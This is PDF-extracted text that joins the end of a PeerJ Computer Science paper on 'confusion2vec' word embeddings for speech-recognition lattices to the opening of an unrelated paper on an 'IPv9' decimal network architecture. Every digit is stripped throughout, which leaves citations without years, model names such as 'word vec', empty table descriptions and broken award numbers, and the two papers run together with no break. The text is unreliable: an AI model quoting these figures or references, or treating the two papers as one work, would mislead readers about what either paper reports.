/fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (costa-jussà & fonollosa, ; niehues & kolss, ; hardmeier, bisazza & federico, ), morphological transformations (dyer, ; hardmeier, bisazza & federico, ), word segmentations (dyer, ), paraphrases (onishi, utiyama & sumita, ) are used to introduce ambiguity and alternatives for training machine translation systems (wuebker & ney, ; dyer, muresan & resnik, ; dyer, ). source language alternatives can also be exploited by introducing ambiguity derived from the combination of multiple machine translation systems (matusov, ueffing & ney, ; rosti et al., a; rosti, matsoukas & schwartz, b). in the case of machine translation, the word-confusion subspace is associated with morphological transformations, word segmentations, paraphrases, part-of-speech information, etc., or a combination of them. although the word-confusion subspace is not orthogonal, the explicit modeling of such ambiguity relationships is beneficial. nlp: other nlp based applications like paraphrase generation (quirk, brockett & dolan, ), word segmentation (kruengkrai et al., ), part-of-speech tagging (kruengkrai et al., ) also operate on lattices. 
as discussed in the section “machine learning algorithms,” confusion vec can exploit the ambiguity present in the lattices for the betterment of the tasks. asr: in asr systems, word lattices and confusion networks are often re-scored using various algorithms to improve their performances by exploiting ambiguity (sundermeyer et al., ; mangu, brill & stolcke, ; xiong et al., ; liu et al., ). in the case of asr, the word-confusion subspace is associated with the acoustic similarity of words which is often orthogonal to the semantic-syntactic subspace as discussed in the section “human speech production, perception and hearing.” examples – are prime cases supporting the need for jointly modeling acoustic word confusions and semantic-syntactic subspace. spoken language understanding: similarly, as in the case of asr, confusion vec could exploit the inherent acoustic word-confusion information for keyword spotting (mangu, brill & stolcke, ), confidence score estimation (mangu, brill & stolcke, ; seigel & woodland, ; kemp & schaaf, ; jiang, ), domain adaptation (shivakumar et al., ), lattice compression (mangu, brill & stolcke, ), spoken content retrieval (chelba, hazen & saraclar, ; hori et al., ), system combinations (mangu, brill & stolcke, ; hoffmeister et al., ), and other spoken language understanding tasks (hakkani-tür et al., ; tur et al., ; marin et al., ) which operate on lattices. speech translation: in speech translation systems, incorporating the word lattices and confusion networks (instead of the single top hypothesis) is beneficial in better integrating speech recognition system to the machine translation systems (bertoldi, zens & federico, ; mathias & byrne, ; matusov, kanthak & ney, ; schultz et al., ). similarly, exploiting uncertainty information between the “asr —machine translation—speech synthesis” systems for speech-to-speech translation is useful (lavie et al., ; wahlster, ). since speech translation involves combination of asr and the machine translation systems, the word-confusion gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ subspace is associated with a combination of acoustic word-similarity (for asr) and morphological-segmentation-paraphrases ambiguities (for machine translation). “see son winter is here” / “voir fils hiver est ici” (example ) “season winter is here” / “saison hiver est ici” (example ) examples and demonstrate a case of speech translation of identically sounding english phrases to french. words “see son” and “season” demonstrate ambiguity in terms of word segmentation. whereas, the phrases “see son” and “season” also exhibit ambiguity in terms of acoustic similarity. by modeling both word-segmentation and acoustic-confusion through word vector representations, the confusion vec can provide crucial information that the french words “voir” and “saison” are confusable under speech translation framework. optical character recognition: in optical character recognition (ocr) systems, the confusion axis is related to pictorial structures of the characters/words. for example, say the characters “a” and “o” are easily confusable thus leading to similar character vectors in the embedding space. in the case of word level confusions leading to words “ward” and “word” being similar with confusion vec (word vec would have the words “word” and “ward” fairly dissimilar). 
having this crucial optical confusion information is useful during ocr decoding on sequence of words when used in conjunction with the linguistic contextual information. image/video scene summarization: the task of scene summarization involves generating descriptive text summarizing the content in one or more images. intuitively, the task would benefit from linguistic contextual knowledge during the text generation. however, with the confusion vec, one can model and expect to capture two additional information streams (i) pictorial confusion of image/object recognizer, and (ii) pictorial context, that is, modeling objects occurring together (e.g., we can expect oven to often appear nearby a stove or other kitchen appliances). the additional streams of valuable information embedded in the lattices can contribute for better decoding. in other words, for example, word vec can exhibit high dissimilarity between the words “lifebuoy” and “donuts”, however, the confusion vec can capture their pictorial similarity in a better word space representation and thus aiding in their end application of scene summarization. conclusion in this work, we proposed a new word vector representation motivated from human speech and perception and aspects of machine learning for incorporating word confusions from lattice like structures. the proposed confusion vec model is meant to capture additional word-confusion information and improve upon the popular word vec models without compromising the inherent information captured by the word vec models. although the word confusions could be domain/task specific, we present a case study on asr lattices where the confusions are based on acoustic similarity of words. specifically, with respect to asr related applications, the aim is to capture the contextual statistics, as with word vec, and additionally also capture the acoustic word gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ confusion statistics. several training configurations are proposed for confusion vec model, each utilizing different degrees of acoustic confusability vs. contextual information, present in the noisy (confusion network) asr output, for modeling the word vector space. further, techniques like pre-training/initializations, model concatenation and joint optimization are proposed and evaluated for the confusion vec models. appropriate evaluation schemes are formulated for the domain specific application. the evaluation schemes are inspired from the popular analogy based question test set and word similarity tasks. a new analogy task and word similarity tasks are designed for the acoustic confusion/similarity scenario. a detailed tabulation of results are presented for the confusion vec model and compared to the baseline word vec models. the results show that the confusion vec can augment additional task-specific word confusion information without compromising on the semantic and syntactic relationships captured by the word vec models. next, detailed analysis is conducted on the confusion vec vector space through pca reduced two-dimensional plots for three independent word relations: (i) semantic relations, (ii) syntactic relations, and (iii) acoustic relations. the analysis further supports our aforementioned experimental inferences. few toy examples are presented toward the task of asr error correction to support the adequacy of the confusion vec over the word vec word representations. 
future work
in the future, we plan to improve the confusion vec model by incorporating sub-word and phonemic transcriptions of words during training. sub-word and character-level information has been shown to improve word vector representations (bojanowski et al., ; chen et al., ). we believe the sub-words and phoneme transcriptions of words are even more relevant to confusion vec: in addition to the improvements expected for the semantic and syntactic representations (as with word vec), since the sub-words and phoneme transcriptions of acoustically similar words are themselves similar, they should help in modeling the confusion vec to a much greater extent. apart from improving the confusion vec model itself, this work opens up new opportunities for incorporating the confusion vec embeddings into a whole range of full-fledged applications such as asr error correction, speech translation, machine translation, discriminative language models, optical character recognition, image/video scene summarization, etc.

appendix
table a . analogy task results with semantic&syntactic splits for the different proposed models (google w v, in-domain w v, c v- , c v-a, c v-c, c v-*), reporting semantic, syntactic, semantic&syntactic, acoustic, semantic-acoustic, syntactic-acoustic, semantic&syntactic-acoustic and average accuracies. notes: c v- , top-confusion; c v-a, intra-confusion; c v-c, inter-confusion; c v-*, hybrid intra-inter. all the models are of dimensions except google w v ( dimensions). numbers inside parentheses indicate top- evaluation accuracy; numbers outside parentheses represent top- evaluation accuracy. google word vec, word vec groundtruth (trained on in-domain data) and baseline word vec (trained on asr transcriptions) perform better on the semantic&syntactic tasks but fare poorly on the acoustic analogy task. intra-confusion performs well on the acoustic analogy task while compromising on the semantic&syntactic task. inter-confusion performs well on both the acoustic analogy and semantic&syntactic tasks. hybrid intra-inter training performs fairly well on all three analogy tasks (acoustic, semantic&syntactic and semantic&syntactic-acoustic).

table a . similarity task results for the different proposed models, reporting word similarity and acoustic similarity in terms of spearman's correlation. notes: all the models are of dimensions except google w v ( dimensions); numbers inside parentheses indicate the correlation p-value. google word vec, baseline word vec, and word vec groundtruth all show high correlations with word similarity while showing poor correlations on acoustic similarity. google word vec and word vec groundtruth, trained on clean data, exhibit negative acoustic similarity correlations; baseline word vec, trained on noisy asr output, shows a small positive acoustic similarity correlation. intra-confusion, inter-confusion, and hybrid intra-inter training show higher correlations on acoustic similarity.

table a . analogy task results with semantic&syntactic splits for model pre-training/initialization. notes: all the models are of dimensions; numbers inside parentheses indicate top- evaluation accuracy and numbers outside parentheses represent top- evaluation accuracy. pre-training is helpful in all the cases and boosts the semantic&syntactic analogy accuracy for all models. for the intra-confusion, inter-confusion and hybrid intra-inter models, pre-training also boosts the semantic&syntactic-acoustic analogy accuracies. a small dip in acoustic analogy accuracies is observed; however, the overall average accuracy improves.

table a . similarity task results for model pre-training/initialization, in terms of spearman's correlation. notes: all the models are of dimensions; numbers inside parentheses indicate the correlation p-value. pre-training boosts the word similarity correlation for all the models. the correlation improves considerably for the intra-confusion, inter-confusion, and hybrid intra-inter models while maintaining good correlation on acoustic similarity.

table a . analogy task results for model concatenation and joint optimization (model concatenation, fixed contextual subspace joint optimization, and unrestricted joint optimization of c v- combined with c v-a, c v-c and c v-*, each fine-tuned with the inter, intra or hybrid scheme). notes: (f), fixed embedding; (l), embedding learned during joint training; all the models are of dimensions; numbers inside parentheses indicate top- evaluation accuracy and numbers outside parentheses represent top- evaluation accuracy. model concatenation provides gains on the acoustic analogy task, and thereby in average accuracy, compared to the results in table a for the intra-confusion and inter-confusion models. fixed contextual subspace and unrestricted joint optimization further improve results over model concatenation. the best results in terms of average accuracy are obtained with unrestricted joint optimization, an absolute improvement of %. the confusion vec models surpass word vec even on the semantic&syntactic analogy task (top- evaluation accuracy).

table a . similarity task results for model concatenation and joint optimization, in terms of spearman's correlation. notes: all the models are of dimensions; numbers inside parentheses indicate the correlation p-value. good correlations are observed for both word similarity and acoustic similarity with model concatenation, with and without joint optimization. all the correlations are found to be statistically significant.

acknowledgements
opinions, interpretations, conclusions and recommendations are those of the author and are not necessarily endorsed by the department of defense.
additional information and declarations

funding
the u.s. army medical research acquisition activity is the awarding and administering acquisition office. this work was supported by the office of the assistant secretary of defense for health affairs through the psychological health and traumatic brain injury research program under award no. w xwh- - - . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors: the u.s. army medical research acquisition activity is the awarding and administering acquisition office. office of the assistant secretary of defense for health affairs through the psychological health and traumatic brain injury research program under award: w xwh- - - .

competing interests
the authors declare that they have no competing interests.

author contributions
prashanth gurunath shivakumar performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft.
panayiotis georgiou conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft.

data availability
the following information was supplied regarding data availability: data are derivatives of ldc datasets (https://www.ldc.upenn.edu) and were derived using standard kaldi recipes as described in the article (http://kaldi-asr.org). our training and validation code is at: https://bitbucket.org/georgiou/confusion vec.

references
abadi m, barham p, chen j, chen z, davis a, dean j, devin m, ghemawat s, irving g, isard m, kudlur m, levenberg j, monga r, moore s, murray dg, steiner b, tucker p, vasudevan v, warden p, wicke m, yu y, zheng x. . tensorflow: a system for large-scale machine learning. in: th usenix symposium on operating systems design and implementation (osdi ). savannah: usenix association, – .
allauzen a. . error detection in confusion network. in: interspeech , eighth annual conference of the international speech communication association. august – , , antwerp, – .
bengio y, ducharme r, vincent p, jauvin c. . a neural probabilistic language model. journal of machine learning research : – .
bengio s, heigold g. . word embeddings for speech recognition. in: interspeech , th annual conference of the international speech communication association. september – , , singapore, – .
bertoldi n, zens r, federico m. . speech translation by confusion network decoding. in: ieee international conference on acoustics, speech and signal processing. vol. . piscataway: ieee, iv– .
transactions of the association for computational linguistics : – doi . /tacl_a_ . botha ja, blunsom p. . compositional morphology for word representations and language modelling. in: proceedings of the th international conference on machine learning, icml . – june , beijing, – . buckman j, neubig g. . neural lattice language models. transactions of the association for computational linguistics : – doi . /tacl_a_ . celebi a, sak h, dikici e, saraçlar m, lehr m, prud’hommeaux e, xu p, glenn n, karakos d, khudanpur s, roark b, sagae k, shafran i, bikel d, callison-burch c, cao y, hall k, hasler e, koehn p, lopez a, post m, riley d. . semi-supervised discriminative language modeling for turkish asr. in: ieee international conference on acoustics, speech and signal processing (icassp). piscataway: ieee, – . chelba c, hazen tj, saraclar m. . retrieval and browsing of spoken content. ieee signal processing magazine ( ): – doi . /msp. . . chen x, xu l, liu z, sun m, luan h. . joint learning of character and word embeddings. in: ijcai’ proceedings of the th international conference on artificial intelligence. palo alto: aaai press, – . chung y-a, wu c-c, shen c-h, lee h-y, lee l-s. . audio word vec: unsupervised learning of audio segment representations using sequence-to-sequence autoencoder. in: interspeech , th annual conference of the international speech communication association. september – , , san francisco, – . cieri c, miller d, walker k. . the fisher corpus: a resource for the next generations of speech-to-text. in: proceedings of the fourth international conference on language resources and evaluation (lrec). vol. . paris: elra, – . costa-jussà mr, fonollosa jar. . analysis of statistical and morphological classes to generate weighted reordering hypotheses on a statistical machine translation system. in: proceedings of the second workshop on statistical machine translation, wmt@acl . june , , prague, – . cotterell r, schütze h. . morphological word-embeddings. in: naacl hlt , the conference of the north american chapter of the association for computational linguistics. may –june , , denver: human language technologies, – . deerwester s, dumais st, furnas gw, landauer tk, harshman r. . indexing by latent semantic analysis. journal of the american society for information science ( ): – . dikici e, celebi a, saraçlar m. . performance comparison of training algorithms for semi- supervised discriminative language modeling. in: interspeech , th annual conference of the international speech communication association. september – , , portland, – . dyer cj. . the “noisier channel”: translation from morphologically complex languages. in: proceedings of the second workshop on statistical machine translation, wmt@acl . june , , prague, – . dyer c. . using a maximum entropy model to build segmentation lattices for mt. in: human language technologies: conference of the north american chapter of the association of computational linguistics, proceedings. may –june , boulder, – . gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tacl_a_ http://dx.doi.org/ . /tacl_a_ http://dx.doi.org/ . /msp. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dyer cj. . a formal model of ambiguity and its applications in machine translation. college park: university of maryland. dyer c, muresan s, resnik p. . generalizing word lattice translation. in: acl , proceedings of the th annual meeting of the association for computational linguistics. 
june – , , columbus, – . erhan d, bengio y, courville a, manzagol p-a, vincent p, bengio s. . why does unsupervised pre-training help deep learning? journal of machine learning research : – . faruqui m, dyer c. . improving vector space word representations using multilingual correlation. in: proceedings of the th conference of the european chapter of the association for computational linguistics, eacl . april – , , gothenburg, – . finkelstein l, gabrilovich e, matias y, rivlin e, solan z, wolfman g, ruppin e. . placing search in context: the concept revisited. in: proceedings of the th international conference on world wide web. new york: acm, – . ghannay s, estève y, camelin n. a. word embeddings combination and neural networks for robustness in asr error detection. in: rd european signal processing conference, eusipco . august –september , , nice, – . ghannay s, estève y, camelin n, deléglise p. . acoustic word embeddings for asr error detection. in: interspeech , th annual conference of the international speech communication association. september – , , san francisco, – . ghannay s, estève y, camelin n, dutrey c, santiago f, adda-decker m. b. combining continuous word representation and prosodic features for asr error prediction. in: proceedings of the third international conference on statistical language and speech processing. vol. , slsp , new york: springer-verlag, – . hakkani-tür d, béchet f, riccardi g, tur g. . beyond asr -best: using word confusion networks in spoken language understanding. computer speech & language ( ): – doi . /j.csl. . . . hardmeier c, bisazza a, federico m. . fbk at wmt : word lattices for morphological reduction and chunk-based reordering. in: proceedings of the joint fifth workshop on statistical machine translation and metrics matr, wmt@acl . july – , , uppsala, – . he w, wang w, livescu k. . multi-view recurrent neural acoustic word embeddings. in: th international conference on learning representations, iclr . april – , , toulon: conference track proceedings. hofmann t. . probabilistic latent semantic analysis. in: uai ‘ : proceedings of the fifteenth conference on uncertainty in artificial intelligence. july –august , , stockholm, – . hoffmeister b, hillard d, hahn s, schluter r, ostendor m, ney h. . cross-site and intra- site asr system combination: comparisons on lattice and -best methods. in: proceedings of the ieee international conference on acoustics, speech, and signal processing, icassp . april – , , honolulu, – . hori t, hetherington il, hazen tj, glass jr. . open-vocabulary spoken utterance retrieval using confusion networks. in: proceedings of the ieee international conference on acoustics, speech, and signal processing, icassp . april – , , honolulu, – . huang eh, socher r, manning cd, ng ay. . improving word representations via global context and multiple word prototypes. in: the th annual meeting of the association for computational linguistics, proceedings of the conference. july – , . vol. . jeju island: long papers, – . gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.csl. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ jiang h. . confidence measures for speech recognition: a survey. speech communication ( ): – doi . /j.specom. . . . joulin a, grave e, bojanowski p, mikolov t. . bag of tricks for efficient text classification. in: proceedings of the th conference of the european chapter of the association for computational linguistics. vol. . 
valencia: short papers, – . kamper h, wang w, livescu k. . deep convolutional acoustic word embeddings using word-pair side information. in: ieee international conference on acoustics, speech and signal processing (icassp). piscataway: ieee, – . kemp t, schaaf t. . estimating confidence using word lattices. in: fifth european conference on speech communication and technology, eurospeech , september – , , rhodes. kim y. . convolutional neural networks for sentence classification. arxiv preprint available at http://arxiv.org/abs/ . . kruengkrai c, uchimoto k, kazama j, wang y, torisawa k, isahara h. . an error-driven word-character hybrid model for joint chinese word segmentation and pos tagging. in: acl , proceedings of the th annual meeting of the association for computational linguistics and the th international joint conference on natural language processing of the afnlp. – august , singapore, – . kurata g, itoh n, nishimura m. . training of error-corrective model for asr without using audio data. in: acoustics, speech and signal processing (icassp), ieee international conference. piscataway: ieee, – . ladhak f, gandhe a, dreyer m, mathias l, rastrow a, hoffmeister b. . latticernn: recurrent neural networks over lattices. in: interspeech , th annual conference of the international speech communication association. september – , , san francisco, – . lavie a, waibel a, levin l, finke m, gates d, gavalda m, zeppenfeld t, zhan p. . janus-iii: speech-to-speech translation in multiple languages. in: ieee international conference on acoustics, speech, and signal processing. vol. . piscataway: ieee, – . le q, mikolov t. . distributed representations of sentences and documents. in: proceedings of the th international conference on machine learning, icml . – june , beijing, – . levin k, henry k, jansen a, livescu k. . fixed-dimensional acoustic embeddings of variable-length segments in low-resource settings. in: ieee workshop on automatic speech recognition and understanding (asru). piscataway: ieee, – . levy o, goldberg y. . dependency-based word embeddings. in: proceedings of the nd annual meeting of the association for computational linguistics, acl . june – , . vol. . baltimore: short papers, – . lilleberg j, zhu y, zhang y. . support vector machines and word vec for text classification with semantic features. in: ieee th international conference on cognitive informatics & cognitive computing (icci� cc). piscataway: ieee, – . ling w, dyer c, black aw, trancoso i. . two/too simple adaptations of word vec for syntax problems. in: naacl hlt , the conference of the north american chapter of the association for computational linguistics. may —june , . denver: human language technologies, – . liu x, wang y, chen x, gales mjf, woodland pc. . efficient lattice rescoring using recurrent neural network language models. in: ieee international conference on acoustics, speech and signal processing (icassp). piscataway: ieee, – . gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.specom. . . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ luong t, socher r, manning c. . better word representations with recursive neural networks for morphology. in: proceedings of the seventeenth conference on computational natural language learning, conll . august – , , sofia, – . mangu l, brill e, stolcke a. . finding consensus in speech recognition: word error minimization and other applications of confusion networks. 
computer speech & language ( ): – doi . /csla. . . marin a, kwiatkowski t, ostendorf m, zettlemoyer l. . using syntactic and confusion network structure for out-of-vocabulary word detection. in: ieee spoken language technology workshop (slt). piscataway: ieee, – . mathias l, byrne w. . statistical phrase-based speech translation. in: ieee international conference on acoustics, speech and signal processing. piscataway: ieee, . matusov e, kanthak s, ney h. . on the integration of speech recognition and statistical machine translation. in: interspeech —eurospeech, th european conference on speech communication and technology. september – , , lisbon, – . matusov e, ueffing n, ney h. . computing consensus translation for multiple machine translation systems using enhanced hypothesis alignment. in: eacl , st conference of the european chapter of the association for computational linguistics, proceedings of the conference, april – , , trento. mikolov t, chen k, corrado g, dean j. a. efficient estimation of word representations in vector space. in: st international conference on learning representations, iclr , may – , , scottsdale: workshop track proceedings. mikolov t, karafiát m, burget l, Černockỳ j, khudanpur s. . recurrent neural network based language model. in: interspeech , th annual conference of the international speech communication association. september – , , makuhari, chiba, – . mikolov t, le qv, sutskever i. b. exploiting similarities among languages for machine translation. arxiv preprint available at http://arxiv.org/abs/ . . mikolov t, sutskever i, chen k, corrado gs, dean j. c. distributed representations of words and phrases and their compositionality. in: advances in neural information processing systems : th annual conference on neural information processing systems . december – , , lake tahoe, – . mnih a, kavukcuoglu k. . learning word embeddings efficiently with noise-contrastive estimation. in: advances in neural information processing systems : th annual conference on neural information processing systems . december – , , lake tahoe, – . niehues j, kolss m. . a pos-based model for long-range reorderings in smt. in: proceedings of the fourth workshop on statistical machine translation, wmt@eacl . march – , , athens, – . ogata j, goto m. . speech repair: quick error correction just by using selection operation for speech input interfaces. in: interspeech —eurospeech, th european conference on speech communication and technology. september – , , lisbon, – . onishi t, utiyama m, sumita e. . paraphrase lattice for statistical machine translation. ieice transactions on information and systems ( ): – doi . /transinf.e .d. . pennington j, socher r, manning c. . glove: global vectors for word representation. in: proceedings of the conference on empirical methods in natural language processing, emnlp . october – , . doha: a meeting of sigdat, a special interest group of the acl, – . povey d, ghoshal a, boulianne g, burget l, glembek o, goel n, hannemann m, motlicek p, qian y, schwarz p, silovsky j, stemmer g, vesely k. . the kaldi speech recognition gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /csla. . http://arxiv.org/abs/ . http://dx.doi.org/ . /transinf.e .d. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ toolkit. in: ieee workshop on automatic speech recognition and understanding, december . piscataway: ieee signal processing society. qiu s, cui q, bian j, gao b, liu t-y. . 
co-learning of word representations and morpheme representations. in: coling , th international conference on computational linguistics, proceedings of the conference. august – , . dublin: technical papers, – . quirk c, brockett c, dolan w. . monolingual machine translation for paraphrase generation. in: proceedings of the conference on empirical methods in natural language processing emnlp , a meeting of sigdat, a special interest group of the acl, held in conjunction with acl . – july , barcelona, – . rosti a-v, ayan nf, xiang b, matsoukas s, schwartz r, dorr b. a. combining outputs from multiple machine translation systems. in: human language technology conference of the north american chapter of the association of computational linguistics, proceedings. april – , , rochester, – . rosti a-v, matsoukas s, schwartz r. b. improved word-level system combination for machine translation. in: acl , proceedings of the th annual meeting of the association for computational linguistics. june – , , prague. sagae k, lehr m, prud’hommeaux e, xu p, glenn n, karakos d, khudanpur s, roark b, saraclar m, shafran i, bikel d, callison-burch c, cao y, hall k, hasler e, koehn p, lopez a, post m, riley d. . hallucinated n-best lists for discriminative language modeling. in: ieee international conference on acoustics, speech and signal processing (icassp). piscataway: ieee, – . schnabel t, labutov i, mimno d, joachims t. . evaluation methods for unsupervised word embeddings. in: proceedings of the conference on empirical methods in natural language processing, emnlp . september – , , lisbon, – . schroeder j, cohn t, koehn p. . word lattices for multi-source translation. in: eacl , th conference of the european chapter of the association for computational linguistics, proceedings of the conference. march —april , , athens, – . schultz t, jou s-c, vogel s, saleem s. . using word latice information for a tighter coupling in speech translation systems. in: interspeech —icslp, th international conference on spoken language processing. october – , , jeju island. seigel ms, woodland pc. . combining information sources for confidence estimation with crf models. in: interspeech , th annual conference of the international speech communication association. august – , , florence, – . shivakumar pg, li h, knight k, georgiou p. . learning from past mistakes: improving automatic speech recognition output via noisy-clean phrase context modeling. apsipa transactions on signal and information processing :e doi . /atsip. . . soricut r, och f. . unsupervised morphology induction using word embeddings. in: naacl hlt , the conference of the north american chapter of the association for computational linguistics. may –june , . denver: human language technologies, – . sperber m, neubig g, niehues j, waibel a. . neural lattice-to-sequence models for uncertain inputs. in: proceedings of the conference on empirical methods in natural language processing, emnlp . september – , , copenhagen, – . su j, tan z, xiong d, ji r, shi x, liu y. . lattice-based recurrent neural network encoders for neural machine translation. in: proceedings of the thirty-first aaai conference on artificial intelligence. february – , , san francisco, – . gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /atsip. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ sundermeyer m, tüske z, schlüter r, ney h. . lattice decoding and rescoring with long- span neural network language models. 
in: interspeech , th annual conference of the international speech communication association. september – , , singapore, – . tai ks, socher r, manning cd. . improved semantic representations from tree-structured long short-term memory networks. in: proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing of the asian federation of natural language processing, acl . july – , . vol. . beijing: long papers, – . tan qf, audhkhasi k, georgiou pg, ettelaie e, narayanan ss. . automatic speech recognition system channel modeling. in: interspeech , th annual conference of the international speech communication association. september – , , makuhari, chiba, – . tan z, su j, wang b, chen y, shi x. . lattice-to-sequence attentional neural machine translation models. neurocomputing : – doi . /j.neucom. . . . tur g, wright j, gorin a, riccardi g, hakkani-tür d. . improving spoken language understanding using word confusion networks. in: th international conference on spoken language processing, icslp interspeech , september – , , denver. wahlster w. . verbmobil: foundations of speech-to-speech translation. berlin, heidelberg: springer science & business media. weide r. . the cmu pronunciation dictionary, release . . available at http://www.speech.cs. cmu.edu/cgi-bin/cmudict. wuebker j, ney h. . phrase model training for statistical machine translation with word lattices of preprocessing alternatives. in: proceedings of the seventh workshop on statistical machine translation, wmt@naacl-hlt . june – , , montreal, – . xing c, wang d, zhang x, liu c. . document classification with distributions of word vectors. in: signal and information processing association annual summit and conference (apsipa), asia-pacific. piscataway: ieee, – . xiong w, droppo j, huang x, seide f, seltzer m, stolcke a, yu d, zweig g. . achieving human parity in conversational speech recognition. arxiv preprint available at http://arxiv.org/abs/ . . xu h, povey d, mangu l, zhu j. . minimum bayes risk decoding and system combination based on a recursion for edit distance. computer speech & language ( ): – doi . /j.csl. . . . xu p, roark b, khudanpur s. . phrasal cohort based unsupervised discriminative language modeling. in: interspeech , th annual conference of the international speech communication association. september – , , portland, – . xue j, zhao y. . improved confusion network algorithm and shortest path search from word lattice. in: proceedings. (icassp’ ). ieee international conference on acoustics, speech, and signal processing, . vol. . piscataway: ieee, – . yin w, schütze h. . learning word meta-embeddings. in: proceedings of the th annual meeting of the association for computational linguistics (volume : long papers) berlin: acl. available at http://aclweb.org/anthology/p/p /p - .pdf. gurunath shivakumar and georgiou ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.neucom. . . http://www.speech.cs.cmu.edu/cgi-bin/cmudict http://www.speech.cs.cmu.edu/cgi-bin/cmudict http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://dx.doi.org/ . /j.csl. . . http://aclweb.org/anthology/p/p /p - .pdf http://dx.doi.org/ . /peerj-cs. 
confusion vec: towards enriching vector space word representations with representational ambiguities. contents: introduction; motivation; case study: application to automatic speech recognition; proposed models; training schemes; evaluation methods; data and experimental setup; results; vector space analysis; discussion; potential applications; conclusion; future work; appendix; references.
doi: . /ijanmc- -
international journal of advanced network, monitoring and controls volume , no. ,
research on the system structure of ipv based on tcp/ip/m
wang jianguo
. state and provincial joint engineering lab.
of advanced network, monitoring and control, xi'an, china
. school of computer science and engineering, xi'an technological university, xi'an, china
e-mail: wjg_xit@ .com

wang zhongsheng
. school of computer science and engineering, xi'an technological university, xi'an, china
. state and provincial joint engineering lab. of advanced network, monitoring and control, xi'an, china
e-mail: wzhsh @ .com

xie jianping
. chinese decimal network working group, shanghai, china
. shanghai decimal system network information technology ltd.
e-mail: @ .cn

zhong wei
. chinese decimal network working group, shanghai, china
. shanghai decimal system network information technology ltd.
e-mail: @ .cn

abstract—network system structure is the basis of network communication. the design of a network model can change the network structure at its root, remedy the deficiencies of the original network system, and meet the new demands of the future network. tcp/ip, as the core network technology, is successful; it has shortcomings but remains a reasonable presence and will continue to play a role. considering compatibility with the original network, a new network model needs to be compatible with the existing tcp/ip four-layer model and, at the same time, provide a better technical system with which to implement the future network. based on the internet three-layer/four-layer hybrid architecture tcp/ip/m and the iso/iec next-generation internet standard solutions, this paper proposes the ipv system architecture, which can directly transmit audio and video data over three layers without affecting the existing four-layer network transmission. the hybrid structure embodies a new transmission model, which requires the establishment of a link before data transmission and the withdrawal of the link after the transmission is completed. it addresses, from the underlying structure of the network, the problem of high-quality real-time media communication raised by the integration of the three networks (communication network, broadcasting network and internet), realizes long-distance and large-traffic data transmission for the future network, and lays a foundation for digital currency and virtual currency on the internet. the system framework is verified by practical application: it has been deployed to verify compatibility and reliable transmission between the ipv network and the existing network, and, under an independent, reliable, secure and controllable network architecture, a new generation of master root server and root domain name servers has been built.

keywords-tcp/ip/m; next generation internet; ipv ; big data stream

i. new generation network system ipv
the ipv protocol is one of the future network concepts. the ietf proposed some basic ideas for ipv in and looked forward to the network of the st century, including a -bit address length, direct routing, and a -layer route addressing method. however, due to the lack of results on the basic theory, address stratification technology, high research and development costs, intellectual property rights and other factors, the research effort publicly failed. in , the ipv working group was disbanded, and no intellectual property or patent results were obtained. inspired by ipv , chinese scholars established a dedicated expert team for a new generation network.
based on the patent "method of using whole digital code to assign addresses for computer", the team completed the development of a new generation network system after more than years of research and development; the theory and practice of the system reflect its novelty and originality. the decimal network has gone through the stages of assumption, theory, model, prototype, small-scale trial and demonstration project implementation. since september , the ministry of information industry of china decided to establish the "decimal network standard working group (also known as the ipv working group)", the "new-generation security and controllable network expert working group" and the "electronic label working group", uniting domestic and foreign enterprises, research institutions and universities to develop the ipv protocol, the digital domain name and other technical standards with independent intellectual property. by june , the ministry of industry and information technology announced the approval of the four standards of the ipv system. through unremitting efforts in various aspects, the ipv system mother root server, the main root server, and the root name servers named after the letters n-z have been developed.

ii. the design of ipv architecture
the conventional packet switching of the tcp/ip protocol does not support real-time and circuit-switched applications, that is, the transmission of sound or images over a circuit within the four-layer protocol. tcp/ip is a connectionless, unreliable packet protocol with a maximum packet size of bytes. the main idea of the ipv design is to combine the ip protocol of tcp/ip with circuit switching, and to make use of routers compatible with both protocols and a series of protocols, so that the addresses of ipv , ipv and ipv can be used simultaneously on the internet.

a. the hierarchy of ipv
the ipv system adopts a mixed network architecture of three-layer circuits and four-layer packet switching; it adopts the rules of verify-first-then-communicate, address encryption, an address length that can vary from -bit to -bit, and resource reservation; and it adopts a character direct-route transmission mode, which applies virtual and real circuits to ensure transmission security. the architecture diagram is shown in figure .

figure . the architecture diagram (the tcp/ip/m three/four-layer model: an application layer, a transport layer with tcp and udp, an internetworking layer with ip and m over a virtual real circuit, and a network interface layer over ethernet).

b. ipv connection method
the tcp/ip/m protocol has developed absolute code stream and long stream code classes; a long packet can reach more than tens of megabytes. it can transmit telephone and cable tv data directly over three layers without affecting existing four-layer networks. it is a four/three-layer transport protocol built on a new transmission model in which the connection link is not removed until the transmission is finished. the connection mode is shown in figure .

figure . the connection mode (user alpha and user beta communicate either over the four-layer packet path across the internet, or over a three-layer composite time-division virtual circuit with user-exclusive bandwidth over network cable or optical fiber, for voice communication, file transfer and video conferencing).
